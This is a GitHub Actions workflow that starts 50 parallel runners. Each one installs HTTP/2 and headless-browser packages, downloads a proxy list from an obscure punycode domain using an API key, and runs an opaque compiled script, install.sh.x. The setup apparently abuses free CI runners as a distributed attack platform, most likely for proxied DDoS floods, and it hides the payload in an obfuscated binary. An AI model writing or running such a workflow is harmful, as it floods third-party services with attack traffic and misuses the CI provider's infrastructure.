name: Parallel Node.js Execution

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:

jobs:
  parallel-execution-ubuntu:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 100
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50]
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
      
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '20'
      
      - name: Install dependencies
        run: npm install net chalk hpack.js hpack colors puppeteer-real-browser
      
      - name: Download proxies
        run: curl -s "https://xn--mnqu23e2hf.lol/api.php?key=user1208&country=all" > proxy.txt
      
      - name: Clone repository and run m.js
        run: |
          chmod +x *
          ./install.sh.x
        env:
          INSTANCE_NUMBER: ${{ matrix.instance }}
          TOTAL_INSTANCES: 50
          RUNNER_OS: ubuntu
